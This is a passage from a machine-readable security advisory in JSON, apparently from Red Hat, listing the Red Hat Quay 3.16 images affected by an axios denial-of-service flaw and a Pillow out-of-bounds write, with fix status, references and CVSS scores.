"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
